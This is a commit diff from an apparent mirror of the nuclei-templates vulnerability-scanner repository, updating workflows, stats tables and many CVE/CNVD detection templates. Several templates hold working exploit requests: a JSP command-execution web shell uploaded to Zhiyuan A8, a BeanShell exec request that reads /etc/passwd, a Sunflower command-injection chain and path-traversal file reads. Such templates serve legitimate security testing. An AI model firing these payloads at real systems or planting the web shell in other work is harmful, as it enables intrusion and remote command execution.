daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2022-03-12 14:05:25 +05:30 committed by GitHub
parent dc6712dbf7 1014b3dd02
commit 713c44a809
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
259 changed files with 4785 additions and 1988 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
.github/workflows/cve-annotate.yml vendored
View File

@ -10,23 +10,25 @@ jobs:
docs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
with:
persist-credentials: false
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- uses: actions/checkout@v2
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup CVE annotate
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
sudo unzip cve-annotate.zip -d /usr/local/bin
working-directory: /tmp
- name: Generate CVE Annotations
id: cve-annotate
run: |
if ! which cve-annotate > /dev/null; then
echo -e "Command cve-annotate not found! Installing\c"
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
fi
cve-annotate -i ./cves/ -d .
echo "::set-output name=changes::$(git status -s | wc -l)"
@ -44,4 +46,4 @@ jobs:
uses: ad-m/github-push-action@master
with:
github_token: ${{ secrets.GITHUB_TOKEN }}
branch: ${{ github.ref }}
branch: ${{ github.ref }}

22
.github/workflows/template-validate.yml vendored
View File

@ -6,25 +6,17 @@ jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@master
- uses: actions/checkout@v2
- name: Get latest Nuclei release version
id: nuclei-latest
uses: actions/github-script@v5
with:
result-encoding: string
script: |
const release = await github.rest.repos.getLatestRelease({
owner: 'projectdiscovery',
repo: 'nuclei',
});
return release.data.name
- name: Get Github tag
id: meta
run: |
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
- name: Setup Nuclei
if: steps.nuclei-latest.outputs.result != ''
if: steps.meta.outputs.tag != ''
env:
VERSION: ${{ steps.nuclei-latest.outputs.result }}
VERSION: ${{ steps.meta.outputs.tag }}
run: |
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
sudo unzip nuclei*.zip -d /usr/local/bin

35
.new-additions
View File

@ -1,14 +1,21 @@
cnvd/2021/CNVD-2021-09650.yaml
cnvd/2021/CNVD-2021-15824.yaml
cves/2017/CVE-2017-18598.yaml
cves/2019/CVE-2019-9726.yaml
cves/2021/CVE-2021-24762.yaml
cves/2021/CVE-2021-41192.yaml
cves/2022/CVE-2022-21371.yaml
cves/2022/CVE-2022-23134.yaml
exposed-panels/homematic-panel.yaml
exposed-panels/phoronix-pane;.yaml
exposed-panels/raspberrymatic-panel.yaml
exposed-panels/redash-panel.yaml
technologies/empirecms-detect.yaml
technologies/snipeit-panel.yaml
cves/2017/CVE-2017-9833.yaml
cves/2020/CVE-2020-13158.yaml
cves/2020/CVE-2020-15050.yaml
cves/2020/CVE-2020-7943.yaml
cves/2021/CVE-2021-3002.yaml
cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
cves/2022/CVE-2022-24990.yaml
default-logins/apollo/apollo-default-login.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
dns/caa-fingerprint.yaml
exposed-panels/kentico-login.yaml
exposed-panels/laravel-filemanager.yaml
exposed-panels/matomo-login-portal.yaml
exposed-panels/puppetboard-panel.yaml
exposed-panels/xweb500-panel.yaml
technologies/puppetdb-detect.yaml
technologies/puppetserver-detect.yaml
vulnerabilities/other/dixell-xweb500-filewrite.yaml
vulnerabilities/other/laravel-filemanager-lfi.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml

3
.nuclei-ignore
View File

@ -13,3 +13,6 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
files:
- cves/2020/CVE-2020-35489.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |
**221 directories, 3173 files**.
**222 directories, 3221 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

2641
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1025 | daffainfo | 539 | cves | 1031 | info | 1042 | http | 2833 |
| panel | 429 | dhiyaneshdk | 405 | exposed-panels | 430 | high | 769 | file | 57 |
| lfi | 422 | pikpikcu | 302 | vulnerabilities | 414 | medium | 606 | network | 48 |
| xss | 329 | pdteam | 253 | technologies | 217 | critical | 374 | dns | 16 |
| wordpress | 324 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 187 | | | | |
| rce | 262 | 0x_akoko | 107 | workflows | 185 | | | | |
| cve2021 | 245 | gy741 | 106 | token-spray | 146 | | | | |
| wp-plugin | 231 | pussycat0x | 102 | default-logins | 75 | | | | |
| tech | 229 | princechaddha | 99 | takeovers | 67 | | | | |
| cve | 1046 | daffainfo | 544 | cves | 1051 | info | 1064 | http | 2880 |
| panel | 441 | dhiyaneshdk | 406 | exposed-panels | 441 | high | 776 | file | 57 |
| lfi | 426 | pikpikcu | 313 | vulnerabilities | 417 | medium | 616 | network | 49 |
| xss | 333 | pdteam | 255 | technologies | 225 | critical | 384 | dns | 16 |
| wordpress | 328 | geeknik | 174 | exposures | 199 | low | 171 | | |
| exposure | 275 | dwisiswant0 | 162 | misconfiguration | 188 | | | | |
| rce | 267 | 0x_akoko | 111 | workflows | 185 | | | | |
| cve2021 | 250 | gy741 | 108 | token-spray | 147 | | | | |
| tech | 236 | princechaddha | 106 | default-logins | 74 | | | | |
| wp-plugin | 235 | pussycat0x | 104 | takeovers | 67 | | | | |

14
cnvd/2019/CNVD-2019-06255.yaml
View File

@ -3,9 +3,17 @@ id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
severity: critical
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
reference:
- https://its401.com/article/yun2diao/91344725
- https://github.com/xwlrbh/Catfish/issues/4
tags: rce,cnvd,catfishcms,cnvd2019
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
requests:
- method: GET
@ -25,3 +33,5 @@ requests:
- 'SHELL'
- 'USER'
condition: and
# Enhanced by cs on 2022/02/28

47
cnvd/2019/CNVD-2019-19299.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CNVD-2019-19299
info:
name: Zhiyuan A8 Arbitrary File Write (RCE)
author: daffainfo
severity: critical
reference:
- https://www.cxyzjd.com/article/guangying177/110177339
- https://github.com/sectestt/CNVD-2019-19299
tags: zhiyuan,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /seeyon/htmlofficeservlet HTTP/1.1
Host: {{Hostname}}
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
= WUghPB3szB3Xwg66 the CREATEDATE
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId = wV66
originalCreateDate = wUghPB3szB3Xwg66
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
needReadFile = yRWZdAS6
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
- |
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_1, "htmoffice operate")'
- 'contains(body_2, "Windows IP")'
condition: and

23
cnvd/2019/CNVD-2019-32204.yaml Normal file
View File

@ -0,0 +1,23 @@
id: CNVD-2019-32204
info:
name: Fanwei e-cology <= 9.0 Remote Code Execution
author: daffainfo
severity: critical
description: The attacker can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
reference: https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
tags: fanwei,cnvd,cnvd2019,rce
requests:
- raw:
- |
POST /bsh.servlet.BshServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
matchers:
- type: regex
regex:
- "root:.*:0:0:"

12
cnvd/2021/CNVD-2021-49104.yaml
View File

@ -2,10 +2,18 @@ id: CNVD-2021-49104
info:
name: Pan Micro E-office File Uploads
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
remediation: Pan Wei has released an update to resolve this vulnerability.
author: pikpikcu
severity: critical
reference: https://chowdera.com/2021/12/202112200602130067.html
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
tags: pan,micro,cnvd,cnvd2021
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
requests:
- raw:
@ -36,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28

42
cnvd/2022/CNVD-2022-03672.yaml Normal file
View File

@ -0,0 +1,42 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal edition RCE
author: daffainfo
severity: critical
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and

2
cves/2004/CVE-2004-0519.yaml
View File

@ -35,5 +35,3 @@ requests:
- "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27

14
default-logins/axis2/axis2-default-login.yaml → cves/2010/CVE-2010-0219.yaml
View File

@ -1,10 +1,16 @@
id: axis2-default-login
id: CVE-2010-0219
info:
name: Axis2 Default Login
name: Apache Axis2 Default Login
author: pikpikcu
severity: high
tags: axis,apache,default-login,axis2
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
tags: cve,cve2010,axis,apache,default-login,axis2
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
classification:
cve-id: CVE-2010-0219
requests:
- raw:
@ -39,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/02

6
cves/2010/CVE-2010-1540.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1540
info:
name: Joomla! Component com_blog - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter.
remediation: Upgrade to a supported version.
reference: |
- https://www.exploit-db.com/exploits/11625
- https://www.cvedetails.com/cve/CVE-2010-1540
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1540
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/06

6
cves/2010/CVE-2010-1601.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1601
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1601
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/06

3
cves/2010/CVE-2010-1602.yaml
View File

@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/07

3
cves/2010/CVE-2010-1607.yaml
View File

@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12316
- https://www.cvedetails.com/cve/CVE-2010-1607
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/07

5
cves/2010/CVE-2010-1657.yaml
View File

@ -5,10 +5,9 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-1657
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1657
@ -26,4 +25,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27

6
cves/2010/CVE-2010-1658.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1658
info:
name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12427
- https://www.cvedetails.com/cve/CVE-2010-1658
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1658
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/27

8
cves/2010/CVE-2010-1659.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12426
- https://www.cvedetails.com/cve/CVE-2010-1659
- https://nvd.nist.gov/vuln/detail/CVE-2010-1659
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1659
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28

4
cves/2010/CVE-2010-1714.yaml
View File

@ -4,7 +4,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
@ -23,4 +22,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/02/28

6
cves/2010/CVE-2010-1715.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1715
info:
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12174
- https://www.cvedetails.com/cve/CVE-2010-1715
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1715
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/10

6
cves/2010/CVE-2010-1717.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1717
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1718.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1718
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1719.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1719
info:
name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12233
- https://www.cvedetails.com/cve/CVE-2010-1719
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1719
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1722.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1722
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

6
cves/2010/CVE-2010-1723.yaml
View File

@ -1,16 +1,17 @@
id: CVE-2010-1723
info:
name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12289
- https://www.cvedetails.com/cve/CVE-2010-1723
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1723
requests:
- method: GET
path:
@ -23,4 +24,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/15
# Enhanced by mp on 2022/03/01

2
cves/2014/CVE-2014-9094.yaml
View File

@ -31,5 +31,3 @@ requests:
- 200
# Enhanced by mp on 2022/02/25
# Enhanced by mp on 2022/02/25

11
cves/2015/CVE-2015-7297.yaml
View File

@ -1,11 +1,16 @@
id: CVE-2015-7297
info:
name: Joomla Core SQL Injection
author: princechaddha
severity: high
description: SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
description: A SQL injection vulnerability in Joomla 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2015-7297
- http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
tags: cve,cve2015,joomla,sqli
classification:
cve-id: CVE-2015-7297
requests:
- method: GET
@ -17,3 +22,5 @@ requests:
words:
- "cf79ae6addba60ad018347359bd144d2"
part: body
# Enhanced by mp on 2022/03/02

2
cves/2016/CVE-2016-3978.yaml
View File

@ -24,4 +24,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

9
cves/2017/CVE-2017-9140.yaml
View File

@ -5,8 +5,11 @@ info:
author: dhiyaneshDk
severity: medium
tags: cve,cve2017,xss,telerik
description: Cross-site scripting (XSS) vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
reference: https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
description: Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.
remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later.
reference:
- https://www.veracode.com/blog/secure-development/anatomy-cross-site-scripting-flaw-telerik-reporting-module
- https://nvd.nist.gov/vuln/detail/CVE-2017-9140
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -29,3 +32,5 @@ requests:
- '#000000"onload="prompt(1)'
- 'Telerik.ReportViewer.axd?name=Resources'
condition: and
# Enhanced by cs on 2022/02/28

31
cves/2017/CVE-2017-9833.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Access to arbitrary files as privileges
author: 0x_Akoko
severity: high
description: The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials.
reference:
- https://www.exploit-db.com/exploits/42290
- https://www.cvedetails.com/cve/CVE-2017-9833
tags: boa,lfr,lfi,cve,cve2017
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2017-9833
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

30
cves/2018/CVE-2018-16716.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2018-16716
info:
name: NCBI ToolBox - Directory Traversal
author: 0x_Akoko
severity: high
description: A path traversal vulnerability exists in viewcgi.c in the 2.0.7 through 2.2.26 legacy versions of the NCBI ToolBox, which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-16716.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-16716
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-16716
cwe-id: CWE-22
tags: cve,cve2018,ncbi,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

36
cves/2018/CVE-2018-18264.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2018-18264
